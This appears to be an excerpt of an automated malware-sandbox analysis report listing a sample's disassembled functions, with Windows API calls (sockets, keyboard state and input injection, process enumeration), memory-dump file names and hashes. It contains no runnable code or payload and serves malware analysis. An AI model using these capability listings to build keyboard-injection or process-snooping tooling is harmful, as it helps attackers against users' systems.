                                                                      • Opcode ID: 4332d10ae5061f3ec4923549eeb334cd0350acb96e8d95c3a433a99ee1b3b970
                                                                      • Instruction ID: c4553bae09b254b1844e3ba603a558c0e60c30939b12502ead2524366147a844
                                                                      • Opcode Fuzzy Hash: 4332d10ae5061f3ec4923549eeb334cd0350acb96e8d95c3a433a99ee1b3b970
                                                                      • Instruction Fuzzy Hash: C1F08235614205DFC724AF54D888F2A77E8FB45B31F24026DE5595B2D1C7711841DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BFD3AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00BFD3BF
                                                                      • FreeLibrary.KERNEL32 ref: 00BFD3E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                      • API String ID: 3013587201-2590602151
                                                                      • Opcode ID: 26eba1617530efadedc704099b96bbff56f097d0d52f77b1a0939bc82807726e
                                                                      • Instruction ID: 767de14f08b4e44d912c147f8d49315c5cdf8d0b5c2ce64b0e4083477a5f108a
                                                                      • Opcode Fuzzy Hash: 26eba1617530efadedc704099b96bbff56f097d0d52f77b1a0939bc82807726e
                                                                      • Instruction Fuzzy Hash: 19E04F7290252A9BD6715710CCD4BBE72E5AF10B01F8445D4FA02F7148EB64CD086BD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ec8244e8bea8500c760ef220877795a57e01db9042bd377f6d45528f157712
                                                                      • Instruction ID: 19abc86af8ad034c24ed1347fc445eee32b25baf650a3249c10215a703b6a5b5
                                                                      • Opcode Fuzzy Hash: a7ec8244e8bea8500c760ef220877795a57e01db9042bd377f6d45528f157712
                                                                      • Instruction Fuzzy Hash: 19C13A75A0020AEFDB15CF94C898BAEB7B5FF48704F218598E515EB2A1D731DE81CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                      • String ID:
                                                                      • API String ID: 1998397398-0
                                                                      • Opcode ID: 9549218ab875c551bbdbd1cc20a9da0c0a1af0fcec47510423eaaec9b69b3981
                                                                      • Instruction ID: 3dcbd650a6fb7fb3c18eb68a0f105085f8bc764f38018dd97ad255148706a65d
                                                                      • Opcode Fuzzy Hash: 9549218ab875c551bbdbd1cc20a9da0c0a1af0fcec47510423eaaec9b69b3981
                                                                      • Instruction Fuzzy Hash: 39A160756183109FC700EF24D895A2AB7E5FF89710F04889DF99A9B362DB34EE01CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C00436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00C005F0
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C00608
                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 00C0062D
                                                                      • _memcmp.LIBVCRUNTIME ref: 00C0064E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID:
                                                                      • API String ID: 314563124-0
                                                                      • Opcode ID: 516aebedfffae0de8e3e7a69bc0999cca36bc526bdaf91dd576eed002a78fb5c
                                                                      • Instruction ID: 1aeaeb202f84206570ec4f16acc8cf9e971c845cb64d31dd6bfec30c37236a31
                                                                      • Opcode Fuzzy Hash: 516aebedfffae0de8e3e7a69bc0999cca36bc526bdaf91dd576eed002a78fb5c
                                                                      • Instruction Fuzzy Hash: 23810B71A00109EFCB04DF94C984EEEB7B9FF89315F214598F516AB290DB71AE46CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BE1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: d398f02e66891cc3ed523394b0565f6f7a17e92b944660fc5cc152522801505f
                                                                      • Instruction ID: 536a211250805b93851b478e081f52b8e4bf64879f4f4193f9b3da644ac8e43d
                                                                      • Opcode Fuzzy Hash: d398f02e66891cc3ed523394b0565f6f7a17e92b944660fc5cc152522801505f
                                                                      • Instruction Fuzzy Hash: 79414D35600591ABDB216BBE8C85FBE3AF5EF41330F344AEAF419D63D2E73448419A61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C36278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(00EB51E0,?), ref: 00C362E2
                                                                      • ScreenToClient.USER32(?,?), ref: 00C36315
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00C36382
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: b4702cf378f53aa95bb79cf43a081dfd58811684d142b3a5a285a42ce76a3115
                                                                      • Instruction ID: 0f0185bf2da40dc6abbc294af2f74fd07e89d7b6f8174882c7899a928b97bfac
                                                                      • Opcode Fuzzy Hash: b4702cf378f53aa95bb79cf43a081dfd58811684d142b3a5a285a42ce76a3115
                                                                      • Instruction Fuzzy Hash: EE514F75A10209EFCF10DF68D881AAE7BB5FF45360F148169F9659B2A0D731EE81CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C21AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00C21AFD
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21B0B
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C21B8A
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21B94
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$socket
                                                                      • String ID:
                                                                      • API String ID: 1881357543-0
                                                                      • Opcode ID: 413e89300a482c6dbc2e5b27f16039314d3ab90c93e92e82b59fe8b83ebb243a
                                                                      • Instruction ID: 34dd0ae74a8f99892c233a5d402ef92c9f7171b543b960df5dadaabfaa34b87f
                                                                      • Opcode Fuzzy Hash: 413e89300a482c6dbc2e5b27f16039314d3ab90c93e92e82b59fe8b83ebb243a
                                                                      • Instruction Fuzzy Hash: B341D274640210AFE720AF24D886F3A77E5AB45718F588488F92A9F7D3D772DD418B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb43fc115f1efda2aa4526e2fdc32c2f6273ef7dc272ce26e137ca6d05ec1dc9
                                                                      • Instruction ID: 35adf8395adfbae753172781870d14cb318d63e08712ae301621d858efa05b09
                                                                      • Opcode Fuzzy Hash: cb43fc115f1efda2aa4526e2fdc32c2f6273ef7dc272ce26e137ca6d05ec1dc9
                                                                      • Instruction Fuzzy Hash: B641C175A00644EFD724EF78C841FAABBE9EB88710F2145AFF551DB382E77199018B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C156D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C15783
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C157A9
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C157CE
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C157FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: 59a6ac7422a2270336d9362c51ad612674a1edc29c0dae8ee7c2b536aac3cd8d
                                                                      • Instruction ID: b250cff0909042054e6df5850588749d0bf2ec87618f41908877776d00bf9ab1
                                                                      • Opcode Fuzzy Hash: 59a6ac7422a2270336d9362c51ad612674a1edc29c0dae8ee7c2b536aac3cd8d
                                                                      • Instruction Fuzzy Hash: BD415E35654610DFCB11EF15C495A5EBBE2EF9A320F18C488E85AAB362CB31FD40DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00BC6D71,00000000,00000000,00BC82D9,?,00BC82D9,?,00000001,00BC6D71,8BE85006,00000001,00BC82D9,00BC82D9), ref: 00BDD910
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BDD999
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BDD9AB
                                                                      • __freea.LIBCMT ref: 00BDD9B4
                                                                        • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: 4be2b48f5f414dacc0d758cc473fea8264912934b1064e1fe070091f3b14ae06
                                                                      • Instruction ID: f90f399dd50dc92f926e8b3551826f0670516352f292e06ccabe85aa61e65d2b
                                                                      • Opcode Fuzzy Hash: 4be2b48f5f414dacc0d758cc473fea8264912934b1064e1fe070091f3b14ae06
                                                                      • Instruction Fuzzy Hash: 5831E172A0020AABDF24DF65DC91EAEBBE5EB40310F0502A9FC44D7250EB3ADD50CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00C0ABF1
                                                                      • SetKeyboardState.USER32(00000080), ref: 00C0AC0D
                                                                      • PostMessageW.USER32 ref: 00C0AC74
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00C0ACC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 528ca6048dc14900e78d64a7bbcdfefa3f4d9abdbafb343e5dfdb57a272ff45a
                                                                      • Instruction ID: 28d9d03224f40d0905ffc0acb22d2c500be22e6c4f2514e72eaf62849703ca14
                                                                      • Opcode Fuzzy Hash: 528ca6048dc14900e78d64a7bbcdfefa3f4d9abdbafb343e5dfdb57a272ff45a
                                                                      • Instruction Fuzzy Hash: FE310530A04718AFFF35CB65CC097FE7BA5AB89310F05431AE4A5961D1C3768B85D792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C37674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: cb5987ff9894e62bc578704a14dc21af3eb1284c3729f69ed5dd95898b4b7f08
                                                                      • Instruction ID: 3f5ed2dc6eeb21ee92ee50e2c973ab54d037fbd76f82430fa11e0ad702b4c7f5
                                                                      • Opcode Fuzzy Hash: cb5987ff9894e62bc578704a14dc21af3eb1284c3729f69ed5dd95898b4b7f08
                                                                      • Instruction Fuzzy Hash: F84182B4615214EFCB22CF58C895FAD77F5FB4A314F1942A8E9259B261C730A942CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C316DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00C316EB
                                                                        • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                                        • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A5E
                                                                        • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00C03A65
                                                                      • GetCaretPos.USER32(?), ref: 00C316FF
                                                                      • ClientToScreen.USER32(00000000,?), ref: 00C3174C
                                                                      • GetForegroundWindow.USER32 ref: 00C31752
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: 8fe41b99b2ce8f7aed3aabfd19ff32e6b42726e7e542d2fb72fc9801b2c28a07
                                                                      • Instruction ID: ef2ccf1c91bd1a1bb693f3af0610933e0873e48032dae4aa165a6c4e6bf166d8
                                                                      • Opcode Fuzzy Hash: 8fe41b99b2ce8f7aed3aabfd19ff32e6b42726e7e542d2fb72fc9801b2c28a07
                                                                      • Instruction Fuzzy Hash: FC315071E14149AFCB00EFA9C8C1DAEBBFDEF49304B5480AAE415E7211DB319E45CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00C0D501
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00C0D50F
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00C0D52F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C0D5DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: d4df14595b2016c7efce9a80acdec77f033b3b4f4257c025870718d384ff7aff
                                                                      • Instruction ID: 31cf465ecb248201f34f7cb62d760e17c47b97dc56c7b52888c4d7e03f5d1813
                                                                      • Opcode Fuzzy Hash: d4df14595b2016c7efce9a80acdec77f033b3b4f4257c025870718d384ff7aff
                                                                      • Instruction Fuzzy Hash: AA31A2711083009FD300EF54CC81BAFBBF8EF9A394F14096DF592961A1EB719A45DBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C38FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • GetCursorPos.USER32(?), ref: 00C39001
                                                                      • TrackPopupMenuEx.USER32 ref: 00C39016
                                                                      • GetCursorPos.USER32(?), ref: 00C3905E
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BF7711,?,?,?), ref: 00C39094
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
